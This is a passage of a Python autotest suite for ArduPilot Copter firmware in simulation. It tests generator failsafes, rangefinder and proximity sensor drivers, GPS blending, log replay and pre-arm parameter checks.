self.wait_generator_speed_and_state(3000, 10000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.progress("Moving *back* to run")
self.set_rc(9, 2000) # remember this is a switch position - run
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
self.set_message_rate_hz("GENERATOR_STATUS", -1)
self.set_parameter("LOG_DISARMED", 0)
if not self.current_onboard_log_contains_message("GEN"):
raise NotAchievedException("Did not find expected GEN message")
def test_ie24(self):
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SERIAL5_BAUD", 115200)
self.set_parameter("GEN_TYPE", 2)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("SIM_IE24_ENABLE", 1)
self.set_parameter("LOG_DISARMED", 1)
self.customise_SITL_commandline(["--uartF=sim:ie24"])
self.wait_ready_to_arm()
self.arm_vehicle()
self.disarm_vehicle()
# Test for pre-arm check fail when state is not running
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.set_parameter("SIM_IE24_STATE", 8)
self.wait_statustext("Status not running", timeout=40)
self.try_arm(result=False,
expect_msg="Status not running")
self.set_parameter("SIM_IE24_STATE", 2) # Explicitly set state to running
# Test that error code does result in failsafe
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_IE24_ERROR", 30)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_IE24_ERROR", 0)
self.set_parameter("DISARM_DELAY", 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_aux_switch_options(self):
self.set_parameter("RC7_OPTION", 58) # clear waypoints
self.load_mission("copter_loiter_to_alt.txt")
self.set_rc(7, 1000)
self.assert_mission_count(5)
self.progress("Clear mission")
self.set_rc(7, 2000)
self.delay_sim_time(1) # allow switch to debounce
self.assert_mission_count(0)
self.set_rc(7, 1000)
self.set_parameter("RC7_OPTION", 24) # reset mission
self.delay_sim_time(2)
self.load_mission("copter_loiter_to_alt.txt")
set_wp = 4
self.set_current_waypoint(set_wp)
self.wait_current_waypoint(set_wp, timeout=10)
self.progress("Reset mission")
self.set_rc(7, 2000)
self.delay_sim_time(1)
self.drain_mav()
self.wait_current_waypoint(0, timeout=10)
self.set_rc(7, 1000)
def test_aux_functions_in_mission(self):
self.load_mission("aux_functions.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_mode('ALT_HOLD')
self.change_mode('AUTO')
self.wait_rtl_complete()
def fly_rangefinder_drivers_fly(self, rangefinders):
'''ensure rangefinder gives height-above-ground'''
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0)
)
for i in range(0, len(rangefinders)):
name = rangefinders[i]
self.progress("i=%u (%s)" % (i, name))
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message for id==%u (%s)" % (i, name))
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"distance sensor.current_distance (%f) (%s) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, name, gpi.relative_alt/1000.0))
self.land_and_disarm()
self.progress("Ensure RFND messages in log")
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("No RFND messages in log")
def fly_proximity_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink proximity sensor using DISTANCE_SENSOR messages") # noqa
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("PRX_TYPE", 2) # mavlink
self.reboot_sitl()
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
50, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
# now make sure we get echoed back the same sorts of things we send:
# distances are in cm
distance_map = {
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE: 30,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_45: 35,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_90: 20,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_135: 15,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_180: 70,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_225: 80,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_270: 10,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_315: 90,
}
wanted_distances = copy.copy(distance_map)
sensor_enum = mavutil.mavlink.enums["MAV_SENSOR_ORIENTATION"]
def my_message_hook(mav, m):
if m.get_type() != 'DISTANCE_SENSOR':
return
self.progress("Got (%s)" % str(m))
want = distance_map[m.orientation]
got = m.current_distance
# ArduPilot's floating point conversions make it imprecise:
delta = abs(want-got)
if delta > 1:
self.progress(
"Wrong distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
return
if m.orientation not in wanted_distances:
return
self.progress(
"Correct distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
del wanted_distances[m.orientation]
self.install_message_hook_context(my_message_hook)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not give right distances") # noqa
for (orient, dist) in distance_map.items():
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
90, # max_distance cm
dist, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
orient, # orientation
255 # covariance
)
self.wait_heartbeat()
if len(wanted_distances.keys()) == 0:
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink rangefinder using DISTANCE_SENSOR messages")
self.context_push()
self.set_parameter('RTL_ALT_TYPE', 0)
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.reboot_sitl()
self.set_parameter("RNGFND1_MAX_CM", 32767)
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance
50, # max_distance
20, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Landing gear should deploy with current_distance below min_distance")
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_parameter("SERVO10_FUNCTION", 29)
self.set_parameter("LGR_DEPLOY_ALT", 1)
self.set_parameter("LGR_RETRACT_ALT", 10) # metres
self.delay_sim_time(1) # servo function maps only periodically updated
# self.send_debug_trap()
self.run_cmd(
mavutil.mavlink.MAV_CMD_AIRFRAME_CONFIGURATION,
0,
0, # deploy
0,
0,
0,
0,
0
)
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
2500, # max_distance (cm)
200, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.context_collect("STATUSTEXT")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Retraction did not happen")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
6000, # max_distance (cm)
1500, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.delay_sim_time(0.1)
try:
self.wait_text("LandingGear: RETRACT", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Retracted")
break
# self.send_debug_trap()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Deployment did not happen")
self.progress("Sending distance-sensor message")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
300, # min_distance
500, # max_distance
250, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
try:
self.wait_text("LandingGear: DEPLOY", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Deployed")
break
self.disarm_vehicle()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_gsf(self):
'''test the Gaussian Sum filter'''
ex = None
self.context_push()
try:
self.set_parameter("EK2_ENABLE", 1)
self.reboot_sitl()
self.takeoff(20, mode='LOITER')
self.set_rc(2, 1400)
self.delay_sim_time(5)
self.set_rc(2, 1500)
self.progress("Path: %s" % self.current_onboard_log_filepath())
dfreader = self.dfreader_for_current_onboard_log()
self.do_RTL()
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# ensure log messages present
want = set(["XKY0", "XKY1", "NKY0", "NKY1"])
still_want = want
while len(still_want):
m = dfreader.recv_match(type=want)
if m is None:
raise NotAchievedException("Did not get %s" % want)
still_want.remove(m.get_type())
def fly_rangefinder_mavlink(self):
self.fly_rangefinder_mavlink_distance_sensor()
# explicit test for the mavlink driver as it doesn't play so nice:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.customise_SITL_commandline(['--uartF=sim:rf_mavlink'])
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Mavlink rangefinder not working")
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
print("rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0))
continue
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message")
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
print(
"distance sensor.current_distance (%f) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, gpi.relative_alt/1000.0))
continue
break
self.progress("mavlink rangefinder OK")
self.land_and_disarm()
def fly_rangefinder_driver_maxbotix(self):
ex = None
try:
self.context_push()
self.start_subtest("No messages")
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
if rf is not None:
raise NotAchievedException("Receiving DISTANCE_SENSOR when I shouldn't be")
self.start_subtest("Default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to non-default address")
self.set_parameter("RNGFND1_ADDR", 0x71)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Two MaxBotix RangeFinders")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.set_parameter("RNGFND1_MIN_CM", 150)
self.set_parameter("RNGFND2_TYPE", 2) # maxbotix
self.set_parameter("RNGFND2_ADDR", 0x71)
self.set_parameter("RNGFND2_MIN_CM", 250)
self.reboot_sitl()
self.do_timesync_roundtrip()
for i in [0, 1]:
rf = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=5,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
self.progress("Got id==%u (%s)" % (i, str(rf)))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
expected_dist = 150
if i == 1:
expected_dist = 250
if rf.min_distance != expected_dist:
raise NotAchievedException("Unexpected min_cm (want=%u got=%u)" %
(expected_dist, rf.min_distance))
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_drivers(self):
self.set_parameter("RTL_ALT", 500)
self.set_parameter("RTL_ALT_TYPE", 1)
drivers = [
("lightwareserial", 8), # autodetected between this and -binary
("lightwareserial-binary", 8),
("ulanding_v0", 11),
("ulanding_v1", 11),
("leddarone", 12),
("maxsonarseriallv", 13),
("nmea", 17),
("wasp", 18),
("benewake_tf02", 19),
("blping", 23),
("benewake_tfmini", 20),
("lanbao", 26),
("benewake_tf03", 27),
("gyus42v2", 31),
]
while len(drivers):
do_drivers = drivers[0:3]
drivers = drivers[3:]
command_line_args = []
for (offs, cmdline_argument, serial_num) in [(0, '--uartE', 4),
(1, '--uartF', 5),
(2, '--uartG', 6)]:
if len(do_drivers) > offs:
(sim_name, rngfnd_param_value) = do_drivers[offs]
command_line_args.append("%s=sim:%s" %
(cmdline_argument, sim_name))
serial_param_name = "SERIAL%u_PROTOCOL" % serial_num
self.set_parameter(serial_param_name, 9) # rangefinder
self.set_parameter("RNGFND%u_TYPE" % (offs+1), rngfnd_param_value)
self.customise_SITL_commandline(command_line_args)
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
self.fly_rangefinder_mavlink()
i2c_drivers = [
("maxbotixi2cxl", 2),
]
while len(i2c_drivers):
do_drivers = i2c_drivers[0:9]
i2c_drivers = i2c_drivers[9:]
count = 1
for d in do_drivers:
(sim_name, rngfnd_param_value) = d
self.set_parameter("RNGFND%u_TYPE" % count, rngfnd_param_value)
count += 1
self.reboot_sitl()
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
def fly_ship_takeoff(self):
# test ship takeoff
self.wait_groundspeed(0, 2)
self.set_parameter("SIM_SHIP_ENABLE", 1)
self.set_parameter("SIM_SHIP_SPEED", 10)
self.set_parameter("SIM_SHIP_DSIZE", 2)
self.wait_ready_to_arm()
# we should be moving with the ship
self.wait_groundspeed(9, 11)
self.takeoff(10)
# above ship our speed drops to 0
self.wait_groundspeed(0, 2)
self.land_and_disarm()
# ship will have moved on, so we land on the water which isn't moving
self.wait_groundspeed(0, 2)
def test_parameter_validation(self):
# wait 10 seconds for initialisation
self.delay_sim_time(10)
self.progress("invalid; min must be less than max:")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 50)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; min must be less than max (equal case):")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (min=0)")
self.set_parameter("MOT_PWM_MIN", 0)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (max=0)")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 0)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
def test_alt_estimate_prearm(self):
self.context_push()
ex = None
try:
# disable barometer so there is no altitude source
self.set_parameter("SIM_BARO_DISABLE", 1)
self.set_parameter("SIM_BARO2_DISABL", 1)
self.wait_gps_disable(position_vertical=True)
# turn off arming checks (mandatory arming checks will still be run)
self.set_parameter("ARMING_CHECK", 0)
# delay 12 sec to allow EKF to lose altitude estimate
self.delay_sim_time(12)
self.change_mode("ALT_HOLD")
self.assert_prearm_failure("Need Alt Estimate")
# force arm vehicle in stabilize to bypass barometer pre-arm checks
self.change_mode("STABILIZE")
self.arm_vehicle()
self.set_rc(3, 1700)
try:
self.change_mode("ALT_HOLD", timeout=10)
except AutoTestTimeoutException:
self.progress("PASS not able to set mode without Position : %s" % "ALT_HOLD")
# check that mode change to ALT_HOLD has failed (it should)
if self.mode_is("ALT_HOLD"):
raise NotAchievedException("Changed to ALT_HOLD with no altitude estimate")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def test_ekf_source(self):
self.context_push()
ex = None
try:
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.wait_ready_to_arm()
self.start_subtest("bad yaw source")
self.set_parameter("EK3_SRC3_YAW", 17)
self.assert_prearm_failure("Check EK3_SRC3_YAW")
self.context_push()
self.start_subtest("missing required yaw source")
self.set_parameter("EK3_SRC3_YAW", 3) # External Yaw with Compass Fallback
self.set_parameter("COMPASS_USE", 0)
self.set_parameter("COMPASS_USE2", 0)
self.set_parameter("COMPASS_USE3", 0)
self.assert_prearm_failure("EK3 sources require Compass")
self.context_pop()
except Exception as e:
self.disarm_vehicle(force=True)
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_replay_gps_bit(self):
self.set_parameters({
"LOG_REPLAY": 1,
"LOG_DISARMED": 1,
"EK3_ENABLE": 1,
"EK2_ENABLE": 1,
"AHRS_TRIM_X": 0.01,
"AHRS_TRIM_Y": -0.03,
"GPS_TYPE2": 1,
"GPS_POS1_X": 0.1,
"GPS_POS1_Y": 0.2,
"GPS_POS1_Z": 0.3,
"GPS_POS2_X": -0.1,
"GPS_POS2_Y": -0.02,
"GPS_POS2_Z": -0.31,
"INS_POS1_X": 0.12,
"INS_POS1_Y": 0.14,
"INS_POS1_Z": -0.02,
"INS_POS2_X": 0.07,
"INS_POS2_Y": 0.012,
"INS_POS2_Z": -0.06,
"RNGFND1_TYPE": 1,
"RNGFND1_PIN": 0,
"RNGFND1_SCALING": 30,
"RNGFND1_POS_X": 0.17,
"RNGFND1_POS_Y": -0.07,
"RNGFND1_POS_Z": -0.005,
"SIM_SONAR_SCALE": 30,
"SIM_GPS2_DISABLE": 0,
})
self.reboot_sitl()
current_log_filepath = self.current_onboard_log_filepath()
self.progress("Current log path: %s" % str(current_log_filepath))
self.change_mode("LOITER")
self.wait_ready_to_arm(require_absolute=True)
self.arm_vehicle()
self.takeoffAndMoveAway()
self.do_RTL()
self.reboot_sitl()
return current_log_filepath
def test_replay_beacon_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_beacon_position()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
return log_difference[2]
def test_replay_optical_flow_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_optical_flow_limits()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
print("log difference: %s" % str(log_difference))
return log_difference[0]
def test_gps_blending(self):
'''ensure we get dataflash log messages for blended instance'''
self.context_push()
ex = None
try:
# configure:
self.set_parameter("GPS_TYPE2", 1)
self.set_parameter("SIM_GPS2_TYPE", 1)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.set_parameter("GPS_AUTO_SWITCH", 2)
self.reboot_sitl()
# ensure we're seeing the second GPS:
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 60:
raise NotAchievedException("Did not get good GPS2_RAW message")
m = self.mav.recv_match(type='GPS2_RAW', blocking=True, timeout=1)
self.progress("%s" % str(m))
if m is None:
continue
if m.lat == 0:
continue
break
# create a log we can expect blended data to appear in:
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(5)
self.disarm_vehicle()
# inspect generated log for messages:
dfreader = self.dfreader_for_current_onboard_log()
wanted = set([0, 1, 2])
while True:
m = dfreader.recv_match(type="GPS") # disarmed
if m is None:
break
try:
wanted.remove(m.I)
except KeyError:
continue
if len(wanted) == 0:
break
if len(wanted):
raise NotAchievedException("Did not get all three GPS types")
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_callisto(self):
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto')), ],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def fly_each_frame(self):
vinfo = vehicleinfo.VehicleInfo()
copter_vinfo_options = vinfo.options[self.vehicleinfo_key()]
known_broken_frames = {
'cwx': "missing defaults file",
'deca-cwx': 'missing defaults file',
'djix': "missing defaults file",
'heli-compound': "wrong binary, different takeoff regime",
'heli-dual': "wrong binary, different takeoff regime",
'heli': "wrong binary, different takeoff regime",
'hexa-cwx': "does not take off",
'hexa-dji': "does not take off",
'octa-quad-cwx': "does not take off",
'tri': "does not take off",
}
for frame in sorted(copter_vinfo_options["frames"].keys()):
self.start_subtest("Testing frame (%s)" % str(frame))
if frame in known_broken_frames:
self.progress("Actually, no I'm not - it is known-broken (%s)" %
(known_broken_frames[frame]))
continue
frame_bits = copter_vinfo_options["frames"][frame]
print("frame_bits: %s" % str(frame_bits))
if frame_bits.get("external", False):
self.progress("Actually, no I'm not - it is an external simulation")
continue
model = frame_bits.get("model", frame)
# the model string for Callisto has crap in it.... we
# should really have another entry in the vehicleinfo data
# to carry the path to the JSON.
actual_model = model.split(":")[0]
defaults = self.model_defaults_filepath("ArduCopter", actual_model)
if type(defaults) != list:
defaults = [defaults]
self.customise_SITL_commandline(
["--defaults", ','.join(defaults), ],
model=model,
wipe=True,
)
self.takeoff(10)
self.do_RTL()
def test_replay(self):
'''test replay correctness'''
self.progress("Building Replay")
util.build_SITL('tools/Replay', clean=False, configure=False)
self.test_replay_bit(self.test_replay_gps_bit)
self.test_replay_bit(self.test_replay_beacon_bit)
self.test_replay_bit(self.test_replay_optical_flow_bit)
def test_replay_bit(self, bit):
self.context_push()
current_log_filepath = bit()
self.progress("Running replay on (%s)" % current_log_filepath)
util.run_cmd(['build/sitl/tools/Replay', current_log_filepath],
directory=util.topdir(), checkfail=True, show=True)
self.context_pop()
replay_log_filepath = self.current_onboard_log_filepath()
self.progress("Replay log path: %s" % str(replay_log_filepath))
check_replay = util.load_local_module("Tools/Replay/check_replay.py")
ok = check_replay.check_log(replay_log_filepath, self.progress, verbose=True)
if not ok:
raise NotAchievedException("check_replay failed")
def test_copter_gps_zero(self):
# https://github.com/ArduPilot/ardupilot/issues/14236
self.progress("arm the vehicle and takeoff in Guided")
self.takeoff(20, mode='GUIDED')
self.progress("fly 50m North (or whatever)")
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
self.fly_guided_move_global_relative_alt(50, 0, 20)
self.set_parameter('GPS_TYPE', 0)
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 30 and self.mode_is('LAND'):
self.progress("Bug not reproduced")
break
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("Received (%s)" % str(m))
if m is None:
raise NotAchievedException("No GLOBAL_POSITION_INT?!")
pos_delta = self.get_distance_int(old_pos, m)
self.progress("Distance: %f" % pos_delta)
if pos_delta < 5:
raise NotAchievedException("Bug reproduced - returned to near origin")
self.wait_disarmed()
self.reboot_sitl()
# a wrapper around all the 1A,1B,1C..etc tests for travis
def tests1(self):
ret = ([])
ret.extend(self.tests1a())
ret.extend(self.tests1b())
ret.extend(self.tests1c())
ret.extend(self.tests1d())
ret.extend(self.tests1e())
return ret
def tests1a(self):
'''return list of all tests'''
ret = super(AutoTestCopter, self).tests() # about 5 mins and ~20 initial tests from autotest/common.py
ret.extend([
("NavDelayTakeoffAbsTime",
"Fly Nav Delay (takeoff)",
self.fly_nav_takeoff_delay_abstime), # 19s
("NavDelayAbsTime",
"Fly Nav Delay (AbsTime)",
self.fly_nav_delay_abstime), # 20s
("NavDelay",
"Fly Nav Delay",
self.fly_nav_delay), # 19s
("GuidedSubModeChange",
"Test submode change",
self.fly_guided_change_submode),
("LoiterToAlt",
"Loiter-To-Alt",
self.fly_loiter_to_alt), # 25s
("PayLoadPlaceMission",
"Payload Place Mission",
self.fly_payload_place_mission), # 44s
("PrecisionLoiterCompanion",
"Precision Loiter (Companion)",
self.fly_precision_companion), # 29s
("PrecisionLandingSITL",
"Precision Landing (SITL)",
self.fly_precision_sitl), # 29s
("SetModesViaModeSwitch",
"Set modes via modeswitch",
self.test_setting_modes_via_modeswitch),
("SetModesViaAuxSwitch",
"Set modes via auxswitch",
self.test_setting_modes_via_auxswitch),
("AuxSwitchOptions",
"Test random aux mode options",
self.test_aux_switch_options),
("AuxFunctionsInMission",
"Test use of auxilliary functions in missions",
self.test_aux_functions_in_mission),
("AutoTune",
"Fly AUTOTUNE mode",
self.fly_autotune), # 73s
])
return ret
def tests1b(self):
'''return list of all tests'''
ret = ([
("ThrowMode", "Fly Throw Mode", self.fly_throw_mode),
("BrakeMode", "Fly Brake Mode", self.fly_brake_mode),
("RecordThenPlayMission",
"Use switches to toggle in mission, then fly it",
self.fly_square), # 27s
("ThrottleFailsafe",
"Test Throttle Failsafe",
self.fly_throttle_failsafe), # 173s
("GCSFailsafe",
"Test GCS Failsafe",
self.fly_gcs_failsafe), # 239s
# this group has the smallest runtime right now at around
# 5mins, so add more tests here, till its around
# 9-10mins, then make a new group
])
return ret
def tests1c(self):
'''return list of all tests'''
ret = ([
("BatteryFailsafe",
"Fly Battery Failsafe",
self.fly_battery_failsafe), # 164s
("StabilityPatch",
"Fly stability patch",
lambda: self.fly_stability_patch(30)), # 17s
("OBSTACLE_DISTANCE_3D",
"Test proximity avoidance slide behaviour in 3D",
self.OBSTACLE_DISTANCE_3D), # ??s
("AC_Avoidance_Proximity",
"Test proximity avoidance slide behaviour",
self.fly_proximity_avoidance_test), # 41s
("AC_Avoidance_Fence",
"Test fence avoidance slide behaviour",
self.fly_fence_avoidance_test),
("AC_Avoidance_Beacon",
"Test beacon avoidance slide behaviour",
self.fly_beacon_avoidance_test), # 28s
("BaroWindCorrection",
"Test wind estimation and baro position error compensation",
self.fly_wind_baro_compensation),
("SetpointGlobalPos",
"Test setpoint global position",
self.test_set_position_global_int),
("SetpointGlobalVel",
"Test setpoint global velocity",
self.test_set_velocity_global_int),
("SplineTerrain",
"Test Splines and Terrain",
self.test_terrain_spline_mission),
])
return ret
def tests1d(self):
'''return list of all tests'''
ret = ([
("HorizontalFence",
"Test horizontal fence",
